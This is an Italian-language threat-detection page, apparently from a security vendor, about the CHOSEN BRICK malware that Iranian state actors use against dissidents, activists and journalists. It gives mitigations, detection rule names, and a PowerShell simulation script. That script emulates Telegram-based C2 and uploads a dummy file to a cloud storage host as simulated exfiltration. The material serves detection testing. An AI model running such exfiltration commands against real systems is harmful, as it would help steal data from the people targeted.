Attacchi informatici iraniani contro dissidenti, attivisti e giornalisti
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Gli attori sponsorizzati dallo stato iraniano stanno utilizzando il malware CHOSEN BRICK per colpire dissidenti, attivisti e giornalisti in tutto il mondo. Il malware viene distribuito tramite ingegneria sociale su piattaforme come WhatsApp e Telegram, spesso camuffato come applicazioni o file legittimi. Una volta installato, CHOSEN BRICK supporta il furto di dati, la registrazione del microfono e la cancellazione del sistema attraverso il comando e controllo basato su Telegram.
Indagine
L’indagine ha identificato un modello ricorrente di ingegneria sociale seguito dal dispiegamento di CHOSEN BRICK su sistemi Windows. Gli analisti hanno osservato il malware utilizzare bot di Telegram per le comunicazioni C2 e servizi di archiviazione cloud per l’esfiltrazione dei dati. La persistenza è stabilita tramite chiavi specifiche di registro Run, mentre vengono aggiunte esclusioni di Microsoft Defender per aiutare a eludere i controlli di sicurezza.
Mitigazione
Le mitigazioni raccomandate includono il miglioramento della consapevolezza degli utenti sulle tecniche di ingegneria sociale e l’evitamento di software fornito tramite allegati non richiesti. Le organizzazioni dovrebbero anche applicare MFA resistente al phishing, implementare una lista bianca delle applicazioni e mantenere aggiornato il software antivirus. Monitorare connessioni sospette a Telegram e noti fornitori di archiviazione cloud può ulteriormente rafforzare il rilevamento.
Risposta
Se viene rilevata un’attività di CHOSEN BRICK, le organizzazioni dovrebbero collaborare con i loro fornitori IT per esaminare i log degli endpoint per chiavi di registro e percorsi di file associati. Sia i dispositivi aziendali sia quelli personali utilizzati da individui a rischio elevato dovrebbero essere esaminati. I team di sicurezza dovrebbero anche cercare i domini, i nomi di file e altri indicatori tecnici associati alla campagna.
Flusso degli Attacchi
Stiamo ancora aggiornando questa parte.
Rilevazioni
Possibili Punti di Persistenza [ASEPs – Software/NTUSER Hive] (via registry_event)
Possibile Abuso di Telegram Come Canale di Comando e Controllo (via dns_query)
Uso di Telegram e VultrObjects da parte di CHOSEN BRICK per Comunicazioni Maliziose [Connessione di Rete Windows]
Rilevamento della Persistenza di CHOSEN BRICK tramite Chiave Registro Run [Evento Registro di Windows]
Esecuzione della Simulazione
-
Narrazione & Comandi dell’Attacco: L’avversario cerca di stabilire il comando e controllo (C2) ed esfiltrare dati sensibili. Per eludere gli antivirus tradizionali basati su firme, utilizzano servizi web legittimi. Innanzitutto, l’attaccante esegue un comando per “registrarsi” con il loro server C2 tramite l’API di Telegram (
api.telegram.org). Successivamente, l’attaccante simula l’esfiltrazione di un file sensibile caricandolo in un bucket di archiviazione ospitato suvultrobjects.com. Queste azioni sono eseguite tramite richieste web standard per integrarsi con il traffico web crittografato legittimo, sperando di bypassare le ispezioni e di essere catturate solo se specifici IoC sono noti. -
Script di Test di Regressione:
# Script di Simulazione: Emulazione di TTP CHOSEN BRICK # Questo script simula C2 tramite Telegram ed Esfiltrazione tramite VultrObjects $C2_Domain = "api.telegram.org" $Exfil_Domain = "vultrobjects.com" Write-Host "[+] Avvio della Simulazione: Emulazione dei TTP di CHOSEN BRICK..." -ForegroundColor Cyan # 1. Simulare il Check-in del C2 (API di Telegram) Write-Host "[*] Fase 1: Simulazione del check-in del C2 verso $C2_Domain" -ForegroundColor Yellow try { $c2_response = Invoke-WebRequest -Uri "https://$C2_Domain/bot123456:ABC-DEF/getUpdates" -Method Get -ErrorAction SilentlyContinue Write-Host "[+] Richiesta C2 inviata." -ForegroundColor Green } catch { Write-Host "[!] Nota: Connessione fallita (prevista se non c'è internet/proxy), ma dovrebbe comunque essere generata la telemetria." -ForegroundColor Gray } # 2. Simulare l'Esfiltrazione di Dati (VultrObjects) Write-Host "[*] Fase 2: Simulazione di esfiltrazione di dati verso $Exfil_Domain" -ForegroundColor Yellow $dummy_data = "Queste sono informazioni altamente sensibili in fase di esfiltrazione." $dummy_file = "$env:TEMPsensitive_data.txt" $dummy_data | Out-File -FilePath $dummy_file try { # Simulando una richiesta PUT a un endpoint di archiviazione cloud Invoke-RestMethod -Uri "https://$Exfil_Domain/exfil/data_dump.txt" -Method Put -Body $dummy_data -ContentType "text/plain" -ErrorAction SilentlyContinue Write-Host "[+] Richiesta di esfiltrazione inviata." -ForegroundColor Green } catch { Write-Host "[!] Nota: Connessione fallita (prevista se non c'è internet/proxy), ma dovrebbe comunque essere generata la telemetria." -ForegroundColor Gray } Write-Host "[+] Simulazione completata. Controllare i log del proxy nel SIEM coinvolgendo $C2_Domain e $Exfil_Domain." -ForegroundColor Cyan -
Comandi di Pulizia:
# Script di Pulizia $dummy_file = "$env:TEMPsensitive_data.txt" if (Test-Path $dummy_file) { Remove-Item -Path $dummy_file -Force Write-Host "[+] Pulizia: File di esfiltrazione fittizio rimosso." -ForegroundColor Green } else { Write-Host "[!] Pulizia: File fittizio non trovato." -ForegroundColor Yellow }